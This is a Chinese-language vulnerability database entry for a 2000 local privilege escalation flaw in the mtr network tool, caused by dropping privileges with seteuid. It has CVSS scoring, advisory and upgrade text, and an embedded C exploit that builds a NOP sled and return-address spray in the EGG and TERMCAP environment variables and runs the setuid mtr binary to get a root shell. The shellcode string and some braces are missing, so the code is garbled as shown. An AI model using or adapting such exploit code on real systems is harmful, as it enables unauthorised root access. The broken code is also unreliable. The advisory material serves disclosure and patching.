发布时间 :2000-03-03 00:00:00
修订时间 :2008-09-10 15:03:08

[原文]The mtr program only uses a seteuid call when attempting to drop privileges, which could allow local users to gain root privileges.



- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  1038

- 漏洞信息

高危 边界条件错误
2000-03-03 00:00:00 2005-05-02 00:00:00

- 公告与补丁

        Users of mtr should upgrade to version mtr-0.42 or later. An interim solution may be to remove the setuid bit. This will prevent non-root users from being able to gain any root privileges, although it will affect their use of mtr.
        TurboLinux has issued a new package to fix this problem in versions 6.0.2 and prior.

- 漏洞信息 (19796)

Matt Kimball and Roger Wolff mtr 0.28/0.41,Turbolinux 3.5 b2/4.2/4.4/6.0 mtr Vulnerability.2 (EDBID:19796)
multiple local
2000-03-03 Verified
0 Babcia Padlina
N/A [点击下载]

A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling a seteuid(getuid()) call, the authors hoped to drop permissions to prevent the obtaining of root privilege should there be potential vulnerabilities in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will eliminate this potential problem.

/* (c) 2000 babcia padlina / buffer0verfl0w security ( */
/* freebsd mtr-0.41 local root exploit */

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h> 
#include <string.h>   

#define NOP             0x90
#define BUFSIZE         10000
#define ADDRS           1200 

long getesp(void)
   __asm__("movl %esp, %eax\n");

int main(argc, argv)
int argc; 
char **argv;
        char *execshell =
        //execl("/bin/sh", "sh", 0);

        char buf[BUFSIZE+ADDRS+1], *p;
        int noplen, i, ofs;
        long ret, *ap;
        if (argc < 2) { fprintf(stderr, "usage: %s ofs\n", argv[0]); exit(0); }

        ofs = atoi(argv[1]);

        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;
        memset(buf, NOP, noplen);
        buf[noplen+1] = '\0';
        strcat(buf, execshell);
        setenv("EGG", buf, 1);
        p = buf;
        ap = (unsigned long *)p;
        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;
        p = (char *)ap;
        *p = '\0';
        fprintf(stderr, "ret: 0x%x\n", ret);
        setenv("TERMCAP", buf, 1);
        execl("/usr/local/sbin/mtr", "mtr", 0);
        return 0;

- 漏洞信息

mtr seteuid Call Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-03-03 Unknow
2000-03-03 Unknow

- 解决方案

Upgrade to version 0.42 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete